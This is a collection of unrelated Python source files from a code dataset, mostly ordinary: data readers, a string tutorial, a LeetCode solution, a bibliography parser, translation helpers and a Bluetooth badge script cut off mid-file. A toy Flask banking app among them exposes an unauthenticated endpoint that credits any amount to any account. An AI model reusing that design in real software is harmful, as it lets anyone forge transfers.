1000 #[kg/m3]\n\n data = np.loadtxt(infile, delimiter=\",\") \n time = pd.date_range(datetime(int(data[0,0]),int(data[0,1]),int(data[0,2])), \n datetime(int(data[-1,0]),int(data[-1,1]),int(data[-1,2])),freq='D')\n\n tmp = 24*60*60*data[:,3] /( lat_heat_vapor * rho_w * 1000 )\n\n #make pandas series and return daily values\n ass_pd = pd.Series(data[:,4]*24*60*60*10**-6, index = time ) #mm/day\n evap_pd = pd.Series(tmp, index = time ) \n\n return evap_pd, ass_pd\n\ndef read_lpjguess(infile_et, infile_gpp):\n\n lat_heat_vapor = 2.26 #[MJ/kg]\n rho_w = 1000 #[kg/m3]\n\n data_et = np.loadtxt(infile_et, skiprows=1, usecols=3)\n data_gpp = np.loadtxt(infile_gpp, skiprows=1, usecols=3)\n time_tmp = np.loadtxt(infile_gpp, skiprows=1)\n time = pd.date_range(datetime(int(time_tmp[0,0]),int(time_tmp[0,1]),int(time_tmp[0,2])), \n datetime(int(time_tmp[-1,0]),int(time_tmp[-1,1]),int(time_tmp[-1,2])),freq='D')\n\n tmp = 24*60*60*data_et /( lat_heat_vapor * rho_w * 1000 )\n\n #make pandas series and return daily values\n evap_pd = pd.Series(tmp, index = time ) #mm/day\n ass_pd = pd.Series(data_gpp*24*60*60*10**-6, index = time ) \n\n return evap_pd, ass_pd\n\ndef read_maespa(infile):\n\n lat_heat_vapor = 2.26 #[MJ/kg]\n rho_w = 1000 #[kg/m3]\n\n data = np.loadtxt(infile, delimiter=\",\", skiprows=3, usecols=(3,6))\n data[data == -9999.9] = np.nan\n data[data == -999] = np.nan\n time_tmp = np.loadtxt(infile, delimiter=\",\", dtype=np.str, skiprows=3, usecols=0)\n time = pd.date_range(time_tmp[0], time_tmp[-1],freq='30min')\n\n tmp = 30*60*data[:,1] /( lat_heat_vapor * rho_w * 1000 )\n\n evap_pd = pd.Series(tmp, index = time ) #mm/30min\n ass_pd = pd.Series(data[:,0]*30*60*10**-6, index = time ) \n\n return evap_pd, ass_pd\n\ndef read_spa(infile):\n\n lat_heat_vapor = 2.26 #[MJ/kg]\n rho_w = 1000 #[kg/m3]\n\n data = np.loadtxt(infile, delimiter=\",\", skiprows=1, usecols=(1,3))\n time_tmp = np.loadtxt(infile, delimiter=\",\", dtype=np.str, skiprows=1, usecols=0)\n time = pd.date_range(time_tmp[0], time_tmp[-1],freq='30min')\n\n tmp = 30*60*data[:,1] /( lat_heat_vapor * rho_w * 1000 )\n\n evap_pd = pd.Series(tmp, index = time ) #mm/30min\n ass_pd = pd.Series(-1.0*data[:,0]*30*60*10**-6, index = time ) #mol/m2/s\n\n return evap_pd, ass_pd\n\ndef read_cable(infile):\n\n lat_heat_vapor = 2.26 #[MJ/kg]\n rho_w = 1000 #[kg/m3]\n\n ncfile = Dataset(infile)\n data_gpp = np.squeeze(ncfile.variables[\"GPP\"]) # extract variable\n data_et = np.squeeze(ncfile.variables[\"Evap\"]) # extract variable\n time_tmp = np.squeeze(ncfile.variables[\"time\"]) # extract variable\n time_tmp = [pd.to_datetime(\"2007-01-01 00:01:00\") + pd.Timedelta(seconds=i) for i in time_tmp]\n time = pd.date_range(time_tmp[0], time_tmp[-1],freq='30min')\n\n ass_pd = pd.Series(data_gpp*30*60*10**-6, index = time ) \n evap_pd = 30*60*pd.Series(data_et, index = time ) #mm/30min\n\n return evap_pd, ass_pd\n\n\nmain()\n","sub_path":"src_py/plot_meanannuals.py","file_name":"plot_meanannuals.py","file_ext":"py","file_size_in_byte":14915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"227122785","text":"from bank import app, db, bcrypt, login_manager\r\nfrom bank.forms import LoginForm, RegistrationForm, InternalTransferForm, ExternalTransferForm\r\nfrom bank.models import User, TransactionLog\r\nfrom bank.utils import decimal_check\r\nfrom flask import render_template, request, redirect, url_for, flash, jsonify\r\nfrom flask_login import login_user, current_user, login_required, logout_user\r\nfrom decimal import Decimal\r\nimport requests\r\n\r\n\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n\treturn User.query.get(user_id)\r\n\r\n\r\n@app.route(\"/logout\")\r\ndef logout():\r\n\tlogout_user()\r\n\tflash('You have successfully logged out', 'success')\r\n\treturn redirect(url_for('login'))\r\n\r\n\r\n@app.route(\"/\", methods=['GET', 'POST'])\r\n@app.route('/login', methods=['GET', 'POST'])\r\ndef login():\r\n\tlogin_form = LoginForm()\r\n\r\n\tif request.method == 'POST':\r\n\t\tif login_form.validate_on_submit():\r\n\t\t\tuser = User.query.filter_by(email=login_form.email.data).first()\r\n\t\t\tif user and bcrypt.check_password_hash(user.password, login_form.password.data):\r\n\t\t\t\tlogin_user(user)\r\n\t\t\t\treturn redirect(url_for('murasaki'))\r\n\r\n\t\t\telse:\r\n\t\t\t\tflash('The email or password you entered was incorrect, please try again', 'warning')\r\n\t\t\t\treturn redirect(url_for('login'))\r\n\r\n\tcontext = {\r\n\t\t'title': 'Log in to Murasaki Bank',\r\n\t\t'login_form': login_form,\r\n\t}\r\n\treturn render_template('index.html', **context)\r\n\r\n\r\n@app.route('/signup', methods=['GET', 'POST'])\r\ndef signup():\r\n\tsignup_form = RegistrationForm()\r\n\r\n\tif request.method == 'POST':\r\n\t\tif signup_form.validate_on_submit():\r\n\t\t\thash_password = bcrypt.generate_password_hash(signup_form.password.data).decode('utf-8')\r\n\t\t\tuser = User(email=signup_form.email.data, password=hash_password, first_name=signup_form.first_name.data, last_name=signup_form.last_name.data, balance=1000, admin=False,)\r\n\t\t\tdb.session.add(user)\r\n\t\t\tflash('Thank you for signing up for Murasaki Bank!', 'success')\r\n\r\n\t\t\tdb.session.commit()\r\n\t\t\treturn redirect(url_for('login'))\r\n\r\n\tcontext = {\r\n\t\t'title': 'Sign Up For Murasaki Bank',\r\n\t\t'signup_form': signup_form,\r\n\t}\r\n\treturn render_template('signup.html', **context)\r\n\r\n\r\n@app.route('/murasaki', methods=['GET', 'POST'])\r\n@login_required\r\ndef murasaki():\r\n\tinternal_transfer_form = InternalTransferForm()\r\n\r\n\tif request.method == 'POST':\r\n\t\tif internal_transfer_form.validate_on_submit():\r\n\t\t\tsender = current_user\r\n\t\t\trecipient = User.query.filter_by(email=internal_transfer_form.email.data).first()\r\n\t\t\tamount = internal_transfer_form.amount.data\r\n\r\n\t\t\tif amount < 0.01: # Check if user is trying to send 0 or a negative amount\r\n\t\t\t\tflash('You must send more than $0!', 'warning')\r\n\t\t\t\treturn redirect(url_for('murasaki'))\r\n\r\n\t\t\tif decimal_check(amount) > 2: # Make sure user only inputs 2 decimal places\r\n\t\t\t\tflash('Please only enter 2 decimal places!', 'warning')\r\n\t\t\t\treturn redirect(url_for('murasaki'))\r\n\r\n\t\t\tbalance_after_transaction = sender.balance - amount # Check if user will send more than their balance\r\n\t\t\tif balance_after_transaction <= 0:\r\n\t\t\t\tflash('You do not have enough funds for that transaction', \"warning\")\r\n\t\t\t\treturn redirect(url_for('murasaki'))\r\n\r\n\t\t\tsender.balance -= amount\r\n\t\t\trecipient.balance += amount\r\n\r\n\t\t\tabout_sender = \"{0} {1} <{2}>\".format(sender.first_name, sender.last_name, sender.email)\r\n\t\t\tabout_recipient = \"{0} {1} <{2}>\".format(recipient.first_name, recipient.last_name, recipient.email)\r\n\r\n\t\t\tsender_transaction_log =TransactionLog(amount=amount, from_account=about_sender, to_account=about_recipient, user_id=sender.id, positive=False)\r\n\t\t\trecipient_transaction_log =TransactionLog(amount=amount, from_account=about_sender, to_account=about_recipient, user_id=recipient.id, positive=True)\r\n\r\n\t\t\tdb.session.add(sender_transaction_log)\r\n\t\t\tdb.session.add(recipient_transaction_log)\r\n\t\t\tdb.session.commit()\r\n\t\t\tflash('You successfully sent an internal money transfer', 'success')\r\n\t\t\treturn redirect(url_for('murasaki'))\r\n\r\n\tcontext = {\r\n\t\t'user': current_user,\r\n\t\t'title': 'Welcome To Murasaki Bank',\r\n\t\t'internal_transfer': internal_transfer_form,\r\n\t\t'log': TransactionLog.query.order_by(TransactionLog.date.desc()).filter_by(user_id=current_user.id).all()\r\n\t}\r\n\treturn render_template('murasaki.html', **context)\r\n\r\n\r\n@app.route('/murasaki/admin', methods=['GET', 'POST'])\r\n@login_required\r\ndef admin():\r\n\r\n\tif current_user.admin != True:\r\n\t\tflash('You do not have proper permission to view that page!', 'danger')\r\n\t\treturn redirect(url_for('murasaki'))\r\n\r\n\tsignup_form = RegistrationForm()\r\n\r\n\tif request.method == 'POST':\r\n\t\tif signup_form.validate_on_submit():\r\n\t\t\thash_password = bcrypt.generate_password_hash(signup_form.password.data).decode('utf-8')\r\n\t\t\tuser = User(email=signup_form.email.data, password=hash_password, first_name=signup_form.first_name.data, last_name=signup_form.last_name.data, balance=1000, admin=True )\r\n\t\t\tdb.session.add(user)\r\n\t\t\tflash('You created a new Admin User!', 'success')\r\n\r\n\t\t\tdb.session.commit()\r\n\t\t\treturn redirect(url_for('admin'))\r\n\r\n\tcontext = {\r\n\t\t'signup_form': signup_form,\r\n\t\t'user': current_user,\r\n\t\t'users': User.query.order_by(User.last_name).all(),\r\n\t\t'title': 'Welcome To Murasaki Bank Admin Page',\r\n\t\t'logs': TransactionLog.query.order_by(TransactionLog.date.desc()).filter_by(user_id=current_user.id).all()\r\n\t}\r\n\treturn render_template('admin.html', **context)\r\n\r\n\r\ndef my_request(transaction):\r\n\turl = 'http://127.0.0.1:5000/receivemoney?transaction='\r\n\treturn requests.post(url, json=transaction)\r\n\r\n\r\n@app.route('/sendmoney', methods=['GET', 'POST'])\r\n@login_required\r\ndef sendmoney():\r\n\r\n\texternal_transfer = ExternalTransferForm()\r\n\r\n\tif request.method == 'POST':\r\n\t\tif external_transfer.validate_on_submit():\r\n\t\t\tamount = external_transfer.amount.data\r\n\r\n\t\t\tif amount < 0.01: # Check if user is trying to send 0 or a negative amount\r\n\t\t\t\tflash('You must send more than $0!', 'warning')\r\n\t\t\t\treturn redirect(url_for('sendmoney'))\r\n\r\n\t\t\tif decimal_check(amount) > 2: # Make sure user only inputs 2 decimal places\r\n\t\t\t\tflash('Please only enter 2 decimal places!', 'warning')\r\n\t\t\t\treturn redirect(url_for('sendmoney'))\r\n\r\n\t\t\tbalance_after_transaction = current_user.balance - amount # Check if user will send more than their balance\r\n\t\t\tif balance_after_transaction <= 0:\r\n\t\t\t\tflash('You do not have enough funds for that transaction', \"warning\")\r\n\t\t\t\treturn redirect(url_for('sendmoney'))\r\n\r\n\t\t\ttransaction = {}\r\n\t\t\ttransaction['bank'] = 'Murasaki Bank'\r\n\t\t\ttransaction['sender_name'] = \"{0} {1}\".format(current_user.first_name, current_user.last_name)\r\n\t\t\ttransaction['sender_email'] = current_user.email\r\n\t\t\ttransaction['recipient_email'] = external_transfer.email.data\r\n\t\t\ttransaction['amount'] = str(external_transfer.amount.data)\r\n\r\n\t\t\turl = 'http://127.0.0.1:3000/receivemoney?transaction='\r\n\r\n\t\t\tr = my_request(transaction)\r\n\r\n\t\t\tif r.status_code == 200:\r\n\t\t\t\tuser_data = r.json()\r\n\r\n\t\t\t\tcurrent_user.balance -= external_transfer.amount.data\r\n\r\n\t\t\t\tabout_recipient = \"{0} <{1}> at {2}\".format(user_data['data']['recipient_name'], user_data['data']['recipient_email'], user_data['data']['bank'])\r\n\t\t\t\tabout_sender = \"{0} <{1}>\".format(transaction['sender_name'], transaction['sender_email'])\r\n\r\n\t\t\t\tsender_transaction_log = TransactionLog(amount=external_transfer.amount.data, from_account=about_sender, to_account=about_recipient, user_id=current_user.id, positive=False)\r\n\r\n\t\t\t\tdb.session.add(sender_transaction_log)\r\n\t\t\t\tdb.session.commit()\r\n\r\n\t\t\t\tflash('Successfully sent an external transfer', 'success')\r\n\t\t\t\treturn redirect(url_for('murasaki'))\r\n\r\n\t\t\telse:\r\n\t\t\t\tflash('Could not find user based on the email given, try again!', 'warning')\r\n\t\t\t\treturn redirect(url_for('sendmoney'))\r\n\r\n\tcontext = {\r\n\t\t'user': current_user,\r\n\t\t'external_transfer':external_transfer,\r\n\t\t'title': 'Send Money Externally',\r\n\t}\r\n\r\n\treturn render_template('external.html', **context)\r\n\r\n\r\n@app.route('/receivemoney', methods=['GET', 'POST'])\r\ndef receivemoney():\r\n\r\n\ttransaction = request.get_json('transaction')\r\n\tuser = User.query.filter_by(email=transaction['recipient_email']).first()\r\n\r\n\tif user:\r\n\t\tamount = Decimal(transaction['amount'])\r\n\t\tuser.balance += amount\r\n\r\n\t\tabout_recipient = \"{0} {1} <{2}>\".format(user.first_name, user.last_name, user.email)\r\n\t\tabout_sender = \"{0} <{1}> at {2}\".format(transaction['sender_name'], transaction['sender_email'], transaction['bank'])\r\n\t\ttransaction_log = TransactionLog(amount=amount, from_account=about_sender, to_account=about_recipient, user_id=user.id, positive=True)\r\n\r\n\t\tdb.session.add(transaction_log)\r\n\t\tdb.session.commit()\r\n\r\n\t\tuser_data = {}\r\n\t\tuser_data['recipient_name'] = \"{0} {1}\".format(user.first_name, user.last_name)\r\n\t\tuser_data['recipient_email'] = user.email\r\n\t\tuser_data['bank'] = 'Murasaki Bank'\r\n\r\n\t\treturn jsonify({'data': user_data}), 200\r\n\r\n\telse:\r\n\t\treturn jsonify({'user': 'does not exist!'}), 400","sub_path":"bank/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":8828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"364893881","text":"#-----------------------------------------\r\n# 第八章:字符串操作\r\n#-----------------------------------------\r\n#python中三个冒号可以换行,单个冒号不能换行!!!!!!!!!\r\n\r\nfruit = 'banana'\r\nx = list(enumerate(fruit)) #enumerate 列举,枚举\r\nprint(x)\r\n\r\n#下面是很叼的东西!!!!!!!!!!!!!!!!!!!!!\r\nimport sys\r\ndef test(did_pass):\r\n ''' print the result of a test '''\r\n linenum = sys._getframe(1).f_lineno\r\n if did_pass:\r\n masg = 'Test at line {0} ok.'.format(linenum)\r\n else:\r\n msg = ('Test at line {0} FAILED.'.format(linenum))\r\n print(msg)\r\nprint(\"'banana' 的第一个an出现在位置:\",'banana'.find('an'))\r\nprint(\"'banana' 的从第4个位置开始的第一个an出现在位置:\",'banana'.find('an',3))\r\nss = 'well I never did said Alice'\r\nwds = ss.split()\r\nprint(wds)\r\n\r\ns1 = 'His name is {0} and {1}'.format('YuanHao','YH')\r\nprint(s1)\r\nn1 = 4;n2 = 5\r\ns3 = \"2**10 = {0} and {1}*{2} = {3:f}\".format(2**10,n1,n2,n1*n2)\r\nprint(s3)\r\nn1 = \"Paris\"\r\nn2 = \"Whitney\"\r\nn3 = \"Hilton\"\r\nprint(\"Pi to three decimal places is {0:.3f}\".format(3.1415926))\r\nprint(\"123456789 123456789 123456789 123456789 123456789 123456789\")\r\n\r\n#“<”代表左对齐,“^”代表中间对齐,“>”代表右对齐\r\nprint(\"|||{0:<15}|||{1:^15}|||{2:>15}|||Born in {3}|||\".format(n1,n2,n3,1981))\r\n#后面那个数字代表给相应输出内容的宽度,如果没有则默认输出的内容的相应宽度\r\nprint(\"The decimal value {0} converts to hex value {0:x}\".format(123456))\r\nprint('i\\ti**2\\ti**3\\ti**5\\ti**10\\ti**20')\r\nfor i in range(1,11):\r\n print(i,'\\t',i**2,'\\t',i**3,'\\t',i**5,'\\t',i**10,'\\t',i**20)\r\n \r\n#格式化输出,帅到爆!!!!!!!!!!!!!!!!!!!!!\r\nprint('format 输出如下:')\r\nlayout = '{0:>4}{1:>6}{2:>6}{3:>8}{4:>13}{5:>24}'\r\nprint(layout.format('i','i**2','i**3','i**5','i**10','i**20'))\r\nfor i in range(1,11):\r\n print(layout.format(i,i**2,i**3,i**5,i**10,i**20))\r\n\r\nimport string\r\nprint('string.whitespace is: ',string.whitespace)\r\nprint(string.punctuation,'空格是否在punctuation中:',' ' in string.punctuation)\r\ndef remove_punctuation(s):\r\n s_without_punct = ''\r\n for letter in s:\r\n if letter not in string.punctuation:\r\n s_without_punct += letter\r\n return s_without_punct\r\nvv = 'well I ne^ver did $sai%d Alice'\r\nprint(remove_punctuation(vv))\r\nmy_story = \"\"\" Pythons are constrictors, which means that they will\r\n’squeeze’ the life out of their prey. They coil themselves around their\r\nprey and with each breath the creature takes the snake will squeeze a little\r\ntighter until they stop breathing completely. Once the heart stops the prey\r\nis swallowed whole. The entire animal is digested in the snake’s stomach\r\nexcept for fur or feathers. What do you think happens to the fur, feathers,\r\nbeaks, and eggshells? The ’extra stuff’ gets passed out as --- you guessed it\r\n--- snake POOP! \"\"\"\r\nout1 = remove_punctuation(my_story)\r\nwds = out1.lower().split() #.lower()变小写,.upper()变大写\r\nprint(wds)\r\n\r\n#查找含特定字母的单词词频\r\nprint('apple' > 'purple')\r\nprint('P' > 'p')\r\ndef find(s,xx='e'):\r\n num = 0\r\n for item in s:\r\n if xx in item:\r\n num += 1\r\n return num\r\nimport string\r\ndef remove_punctuation(vv):\r\n content = ''\r\n for i in vv:\r\n if i not in string.punctuation:\r\n content += i\r\n return content\r\ndef my_pro(xs):\r\n out1 = remove_punctuation(xs)\r\n out1 = out1.lower()\r\n out1 = out1.split()\r\n sum_num = len(out1)\r\n e_num = find(out1,'e')\r\n print(\"Your text contains {0} words, of which {1} ({2:.1f}%) contain an 'e'\".format(sum_num,e_num,e_num/sum_num*100))\r\nmy_pro(my_story)\r\n\r\ndef reverse(x):\r\n l = len(x)\r\n r_out = ''\r\n for i in range(1,l+1):\r\n r_out += x[-i]\r\n return r_out\r\nprint(reverse('happy'))\r\n\r\ndef mirror(x):\r\n x1 = reverse(x)\r\n m_out = x + x1\r\n return m_out\r\nprint(mirror('happy'))\r\n\r\ndef remove_letter(r,x):\r\n con = ''\r\n for item in x:\r\n if item != r:\r\n con += item\r\n return(con)\r\nprint(remove_letter('a','apple'))\r\nprint(remove_letter('z','banana'))\r\n\r\ndef is_pallindrome(x):\r\n x1 = reverse(x)\r\n if x1 == x:\r\n return True\r\n else:\r\n return False\r\nprint(is_pallindrome('qsed'))\r\n\r\ndef count(vv,x):\r\n return len(x.split(vv))-1\r\nprint(count('er','erfgferdder'))\r\n\r\ndef remove(vv,x):\r\n x1 = x.split(vv)\r\n l = len(x1)\r\n con = ''\r\n for i in range(l):\r\n if i == 1 or i == 0:\r\n con += x1[i]\r\n else:\r\n con = con + vv +x1[i]\r\n return con\r\nprint(remove('an','banana'))\r\nprint(remove('eggs','bicycle'))\r\nprint(remove('cyc','bicycle'))\r\n","sub_path":"Books/How to think like a computer scientist/06.py","file_name":"06.py","file_ext":"py","file_size_in_byte":4812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"172130710","text":"\nclass Solution:\n def majorityElement(self, nums: List[int]) -> List[int]:\n v1, v2 = [], []\n result = []\n for i in nums:\n if i not in v1:\n v1.append(i)\n v2.append(1)\n else:\n v2[v1.index(i)] += 1\n\n for i in range(len(v2)):\n if v2[i] > (len(nums) / 3):\n result.append(v1[i])\n return result","sub_path":"Leetcode/201~250/L229 求众数 II.py","file_name":"L229 求众数 II.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"623281443","text":"# Copyright (c) 2006-2017 Andrey Golovigin\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the\n# \"Software\"), to deal in the Software without restriction, including\n# without limitation the rights to use, copy, modify, merge, publish,\n# distribute, sublicense, and/or sell copies of the Software, and to\n# permit persons to whom the Software is furnished to do so, subject to\n# the following conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\n# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY\n# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\n# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\n# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n\"\"\"parse LaTeX aux file\n\"\"\"\n\nfrom __future__ import unicode_literals, with_statement\n\nimport re\n\nimport pybtex.io\nfrom pybtex.errors import report_error\nfrom pybtex.exceptions import PybtexError\nfrom pybtex import py3compat\n\n\n@py3compat.python_2_unicode_compatible\nclass AuxDataError(PybtexError):\n def __init__(self, message, context=None):\n super(AuxDataError, self).__init__(message, context.filename)\n self.context = context\n\n def get_context(self):\n if self.context.line:\n marker = '^' * len(self.context.line)\n return self.context.line + '\\n' + marker\n\n def __str__(self):\n base_message = py3compat.__str__(super(AuxDataError, self))\n lineno = self.context.lineno\n location = 'in line {0}: '.format(lineno) if lineno else ''\n return location + base_message\n\n\nclass AuxDataContext(object):\n lineno = None\n line = None\n filename = None\n\n def __init__(self, filename):\n self.filename = filename\n\n\nclass AuxData(object):\n command_re = re.compile(r'\\\\(citation|bibdata|bibstyle|@input){(.*)}')\n context = None\n style = None\n data = None\n citations = None\n\n def __init__(self, encoding):\n self.encoding = encoding\n self.citations = []\n self._canonical_keys = {}\n\n def handle_citation(self, keys):\n for key in keys.split(','):\n key_lower = key.lower()\n if key_lower in self._canonical_keys:\n existing_key = self._canonical_keys[key_lower]\n if key != existing_key:\n msg = 'case mismatch error between cite keys {0} and {1}'\n report_error(AuxDataError(msg.format(key, existing_key), self.context))\n self.citations.append(key)\n self._canonical_keys[key_lower] = key\n\n def handle_bibstyle(self, style):\n if self.style is not None:\n report_error(AuxDataError(r'illegal, another \\bibstyle command', self.context))\n else:\n self.style = style\n\n def handle_bibdata(self, bibdata):\n if self.data is not None:\n report_error(AuxDataError(r'illegal, another \\bibdata command', self.context))\n else:\n self.data = bibdata.split(',')\n\n def handle_input(self, filename):\n self.parse_file(filename, toplevel=False)\n\n def handle_command(self, command, value):\n action = getattr(self, 'handle_%s' % command.lstrip('@'))\n action(value)\n\n def parse_line(self, line, lineno):\n self.context.lineno = lineno\n self.context.line = line.strip()\n match = self.command_re.match(line)\n if match:\n command, value = match.groups()\n self.handle_command(command, value)\n\n def parse_file(self, filename, toplevel=True):\n previous_context = self.context\n self.context = AuxDataContext(filename)\n\n with pybtex.io.open_unicode(filename, encoding=self.encoding) as aux_file:\n for lineno, line in enumerate(aux_file, 1):\n self.parse_line(line, lineno)\n\n if previous_context:\n self.context = previous_context\n else:\n self.context.line = None\n self.context.lineno = None\n\n # these errors are fatal - always raise an exception instead of using\n # erorrs.report_error()\n if toplevel and self.data is None:\n raise AuxDataError(r'found no \\bibdata command', self.context)\n if toplevel and self.style is None:\n raise AuxDataError(r'found no \\bibstyle command', self.context)\n\n\ndef parse_file(filename, encoding=None):\n \"\"\"Parse a file and return an AuxData object.\"\"\"\n\n data = AuxData(encoding)\n data.parse_file(filename)\n return data\n","sub_path":"pybtex/pybtex/auxfile.py","file_name":"auxfile.py","file_ext":"py","file_size_in_byte":4867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"321235914","text":"\"\"\"\nA library of helper functions for a translation project.\n\nAuthors: Zarius Dubash, Annie Sheil\n\"\"\"\n\nimport translators as ts\n\nfrom translate import Translator\n\nimport apikey\n\n\ndef new_translator(phrase, src, dest):\n # uses microsoft for when MyMemory limit has been reached\n translator = Translator(provider='microsoft', secret_access_key=apikey.key, from_lang=src, to_lang=dest)\n\n # translator = Translator(from_lang=src, to_lang=dest)\n return translator.translate(phrase)\n\n\nbaiducodes = {\n \"fr\": \"fra\",\n \"ar\": \"ara\",\n \"en\": \"en\",\n \"th\": \"th\",\n \"de\": \"de\",\n \"ja\": \"jp\",\n \"ru\": \"ru\",\n \"nl\": \"nl\",\n \"fi\": \"fin\",\n \"da\": \"dan\",\n \"sv\": \"swe\",\n}\n\n\ndef get_translation(phrase, dest, src):\n \"\"\"\n Get translations of a phrase from three translation engines.\n\n Args:\n phrase: a String, the phrase to be translated\n dest: the language code of the destination language\n src: the language code of the current language of the phrase\n\n Returns:\n a List of three Strings, different translations of the given phrase.\n \"\"\"\n\n return [\n ts.bing(phrase, src, dest, if_use_cn_host=False),\n new_translator(phrase, src, dest),\n ts.baidu(phrase, baiducodes[src], baiducodes[dest], sleep_seconds=0.1),\n ]\n\n\ndef reverse_translation(phraseList, src):\n \"\"\"\n Translate a list of strings back into English using the same translation engine.\n\n Args:\n phraseList: a List of Strings, the phrases to translate\n src: the language code of the current language of the phrases\n\n Returns: a List of Strings, the phrases after translation back into English.\n \"\"\"\n\n translations = []\n i = 0\n for phrase in phraseList:\n translations.append(get_translation(phrase, \"en\", src)[i])\n i += 1\n return translations\n\n\n# bing: 'en': ['af', 'ar', 'as', 'bn', 'bs', 'bg', 'yue', 'ca', 'zh-Hans', 'zh-Hant', 'hr', 'cs', 'da', 'prs', 'nl', 'en', 'et', 'fj', 'fil', 'fi', 'fr', 'fr-ca', 'de', 'el', 'gu', 'ht', 'he', 'hi', 'mww', 'hu', 'is', 'id', 'ga', 'it', 'ja', 'kn', 'kk', 'tlh-Latn', 'tlh-Piqd', 'ko', 'ku', 'kmr', 'lv', 'lt', 'mg', 'ms', 'ml', 'mt', 'mi', 'mr', 'nb', 'or', 'ps', 'fa', 'pl', 'pt', 'pt-pt', 'pa', 'otq', 'ro', 'ru', 'sm', 'sr-Cyrl', 'sr-Latn', 'sk', 'sl', 'es', 'sw', 'sv', 'ty', 'ta', 'te', 'th', 'to', 'tr', 'uk', 'ur', 'vi', 'cy', 'yua'],\n# alibaba: 'en': ['zh', 'ru', 'es', 'fr', 'ar', 'tr', 'pt', 'th', 'id', 'vi']\n# baidu: 'en': ['zh', 'ara', 'est', 'bul', 'pl', 'dan', 'de', 'ru', 'fra', 'fin', 'kor', 'nl', 'cs', 'rom', 'pt', 'jp', 'swe', 'slo', 'th', 'wyw', 'spa', 'el', 'hu', 'it', 'yue', 'cht', 'vie'],\n","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"327276578","text":"#coding=utf-8\n'''首页视图'''\n\nfrom kuangjia import get_file\nfrom taotie.view import data_view\n\n\ndef main(zhuti_dict_L,username=None):\n '''主页主题'''\n\n index_html_0 = get_file.get_file('taotie/view/templates/index.html')\n header_html = get_file.get_file('taotie/view/templates/header.html')\n\n if username:\n header_html = data_view.block_denglu(username,header_html)\n index_html_1 = data_view.block_zi_fu(header_html, index_html_0, 'header')\n\n if zhuti_dict_L:\n zhuti_strs = ''\n zhuti_str = '''
\n

          \n {{zhuti_jieshao}}

'''\n for zhuti_row in zhuti_dict_L:\n zhuti_strs+=data_view.replace_html(zhuti_str,zhuti_row)\n index_html_2 = data_view.block_zi_fu(zhuti_strs,index_html_1,'zhutikuan')\n html = data_view.clear(index_html_2)\n else:\n html = data_view.clear(index_html_1)\n\n return html\n\n\n","sub_path":"taotieblog/taotie/view/view_main.py","file_name":"view_main.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"11062924","text":"#!./capython3\n# To avoid running as root, we use a copy of the Python3 interpreter.\n# Give it the needed capabilities with this command:\n# sudo setcap 'cap_net_raw,cap_net_admin+eip' capython3\n\n# Portions of the Bluetooth interaction parts of this script have been\n# taken from https://stackoverflow.com/questions/23788176/finding-bluetooth-low-energy-with-python\n\n\nimport sys\nimport os\nimport struct\nimport signal\nimport time\nimport errno\nfrom ctypes import (CDLL, get_errno)\nfrom ctypes.util import find_library\nfrom socket import (\n socket,\n AF_BLUETOOTH,\n AF_INET,\n SOCK_RAW,\n SOCK_STREAM,\n BTPROTO_HCI,\n SOL_HCI,\n HCI_FILTER,\n)\nfrom tkinter import *\nfrom PIL import ImageTk, Image\nfrom collections import deque\nimport threading\nimport gatt\nimport random\n\nwait_factor = 50\n\n# With this address set to localhost, the socket should not be visible\n# to hosts on the network, just from the local machine.\ntermaddr = (\"localhost\", 9999)\n\nBADGE_TYPE_TRANSIO = 0x064a\nBADGE_TYPE_TRANSIO_TMP = 0x0858\nBADGE_TYPE_JOCO = 0x0b25\nBADGE_TYPE_ANDNXOR = 0x049e\n\nBADGE_YEAR = \"yr\" # year (Appearance field) in most recent advertisement\nBADGE_YEARS = \"yrs\" # list of years seen for this address\nBADGE_NAME = \"nm\" # badge name (Complete Local Name) in most recent\nBADGE_NAMES = \"nms\" # list of names seen for this address\nBADGE_ID = \"id\" # badge ID (first two octets of Manufacturer Specific Data)\nBADGE_IDS = \"ids\" # list of badge IDs seen for this address\nBADGE_TIME = \"tm\" # time of most recent advertisement received\nBADGE_ADDR = \"ad\" # Advertising Address for this badge (assumed constant)\nBADGE_CNT = \"n\" # number of advertisements received from this address\nBADGE_ID_FAKED = \"faked\" # present if multiple IDs seen for this address\nBADGE_CTRINKET = \"tkt\" # claimed to deserve a trinket\nBADGE_CSCORE = \"csc\" # claimed current score\nBADGE_TYPE = \"ty\" # Badge type (Company ID)\n\nMAIN_DISPLAY_FONTSIZE = 40\n\n\nclass BTAdapter (threading.Thread):\n def __init__(self, master, btQueue):\n threading.Thread.__init__(self)\n self.btQueue = btQueue\n\n self.stop_event = threading.Event()\n\n btlib = find_library(\"bluetooth\")\n if not btlib:\n raise Exception(\n \"Can't find required bluetooth libraries\"\n \" (need to install bluez)\"\n )\n self.bluez = 